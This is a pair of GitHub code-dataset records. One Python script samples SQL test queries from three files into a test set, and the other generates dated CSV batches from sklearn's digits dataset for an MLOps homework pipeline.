{"seq_id":"21097938311","text":"# Randomly selects ~500 queries to test from the 1.4mil query set\n\nimport random\n\ndef main():\n\toutfile = open(\"queries/test-queries.txt\", \"w\")\n\t#h = 100 / 23000\n\t#h = 0\n\th = 1.0\n\toutfile.write(\"JOINLESS\\n\")\n\twith open(\"queries/joinless-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\t#h = 500 / 700000\n\toutfile.write(\"NATURAL\\n\")\n\twith open(\"queries/natural-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\toutfile.write(\"CROSS\\n\")\n\twith open(\"queries/cross-queries.txt\", \"r\") as infile:\n\t\tfor line in infile:\n\t\t\tif random.random() < h:\n\t\t\t\toutfile.write(line)\n\toutfile.close()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"mkitzan/constexpr-sql","sub_path":"tests/scripts/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"72"}
{"seq_id":"4279990969","text":"from sklearn.datasets import load_digits\nimport numpy as np\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\n\nbatch_size = 200\nraw_data_path = \"data/raw/{}/data.csv\"\nraw_target_path = \"data/raw/{}/target.csv\"\n\ndef _generate_data(k: int = 200,\n                   save_data_path: str = None,\n                   save_target_path: str = None,\n                   date: str = datetime.today().strftime('%Y-%m-%d')) -> None:\n    \n    X, y = load_digits(return_X_y=True)\n    idx = np.random.randint(X.shape[0], size=k)\n\n    if save_data_path is not None:\n        save_data_path = save_data_path.format(date)\n        Path(save_data_path[:save_data_path.rfind('/')]).mkdir(parents=True, exist_ok=True)\n        np.savetxt(save_data_path, X[idx].astype(int), fmt=\"%i\", delimiter=\",\")\n    \n\n    if save_target_path is not None:\n        save_target_path = save_target_path.format(date)\n        Path(save_target_path[:save_target_path.rfind('/')]).mkdir(parents=True, exist_ok=True)\n        np.savetxt(save_target_path, y[idx].astype(int), fmt=\"%i\", delimiter=\",\")\n\nif __name__ == \"__main__\": \n    num_days = 10\n    start_date = datetime.today() - timedelta(days = num_days)\n\n    for i in range(num_days):\n        cur_date = start_date + timedelta(days = i)\n\n        _generate_data(\n            batch_size,\n            raw_data_path,\n            raw_target_path,\n            cur_date.strftime('%Y-%m-%d')\n        )\n","repo_name":"made-mlops-2022/pudyakov_yaroslav_made","sub_path":"hw3/scripts/generate_data_stream.py","file_name":"generate_data_stream.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}